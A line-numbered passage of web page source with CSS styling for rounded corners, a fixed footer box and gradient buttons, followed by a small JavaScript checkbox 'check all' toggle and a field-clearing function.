1566 -webkit-border-bottom-right-radius: 7px;
1567 -khtml-border-radius-bottomright: 7px;
1568 -moz-border-radius-bottomright: 7px;
1569 border-bottom-right-radius: 7px;
1570 -webkit-border-bottom-left-radius: 7px;
1571 -khtml-border-radius-bottomleft: 7px;
1572 -moz-border-radius-bottomleft: 7px;
1573 border-bottom-left-radius: 7px;
1574 -webkit-border-top-right-radius: 7px;
1575 -khtml-border-radius-topright: 7px;
1576 -moz-border-radius-topright: 7px;
1577 border-bottom-top-radius: 7px;
1578 }
1579 #xbox {
1580 width: 100%;
1581 position: fixed;
1582 bottom: 0;
1583 left: 0;
1584 height: 70px;
1585 padding: 5px;
1586 text-align: center;
1587 }
1588 #bottom{
1589 position:absolute;
1590 right:0%;
1591}
1592/* This imageless css button was generated by CSSButtonGenerator.com */
1593input[type=submit], input[type=button] {
1594 background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #14ab00), color-stop(1, #0f6f00) );
1595 background:-moz-linear-gradient( center top, #14ab00 5%, #0f6f00 100% );
1596 filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#14ab00', endColorstr='#0f6f00');
1597 background-color:#14ab00;
1598 -moz-border-radius:6px;
1599 -webkit-border-radius:6px;
1600 border-radius:6px;
1601 border:1px solid #303030;
1602 display:inline-block;
1603 color:#000000;
1604 font-family:arial;
1605 font-size:12px;
1606 font-weight:bold;
1607 padding:5px 10px;
1608 text-decoration:none;
1609}input[type=submit]:hover, input[type=button]:hover {
1610 background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #0f6f00), color-stop(1, #14ab00) );
1611 background:-moz-linear-gradient( center top, #0f6f00 5%, #14ab00 100% );
1612 filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#0f6f00', endColorstr='#14ab00');
1613 background-color:#0f6f00;
1614}input[type=submit]:active, input[type=button]:active {
1615 position:relative;
1616 top:1px;
1617}
1618</style>
1619<script type="text/javascript">
1620function removeValue() {
1621document.getElementById('ch').value='';
1622}
1623checked=false;
1624function checkall (checkboxall) {
1625 var aa= document.getElementById('checkboxall');
1626 if (checked == false)
1627 {
1628 checked = true
1629 }
1630 else
1631 {
1632 checked = false
1633 }
1634 for (var i =0; i < aa.elements.length; i++)
1635 {
1636 aa.elements[i].checked = checked;
1637 }
1638 }
1639</script>